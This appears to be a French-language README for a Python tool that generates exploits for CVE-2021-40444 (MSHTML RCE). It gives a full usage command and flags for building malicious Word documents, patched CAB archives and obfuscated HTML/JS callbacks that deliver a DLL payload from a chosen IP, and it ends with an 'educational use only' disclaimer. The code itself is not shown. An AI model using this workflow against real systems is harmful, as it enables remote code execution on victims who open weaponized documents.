
Générateur d'exploit basé sur Python pour CVE-2021-40444 (MSHTML RCE) avec livraison de payload pilotée par des modèles via des documents Office malveillants, des archives CAB et des callbacks HTML/JS obfusqués.
Assurez-vous d'exécuter setup.sh en premier car vous aurez besoin de quelques répertoires. Une fois que vous avez exécuté le script, vous devriez pouvoir exécuter gen.py avec l'exemple donné :
# Usage
python3 gen.py -d document/Sample.docx -p payload/payload.dll -i "http://10.10.10.10" -t html/template.html -c payload.cab -f nothing.inf -r Sample2.docx -obf 3
# Flag
-d -> Our .docx file that already been modified with Bitmap Object whether in header, document or footer
-i -> IP Address
-p -> Payload (.dll)
-t -> HTML File with Javascript
-r -> Rename the output of modified .docx
-c -> Rename the output of patched .cab
-f -> Rename the output of .inf
-obf -> Extra : Comes with 3 mode (HTML Entity, UTF-16BE or Both)
-v -> Increase output verbosity
http.server sera dans le répertoire web. Ce répertoire contiendra 3 fichiers :

Ce dépôt est uniquement à des fins éducatives et n'est pas destiné à être utilisé dans la nature avec de mauvaises intentions. Toute utilisation illégale de ce dépôt relève de votre propre responsabilité et risque.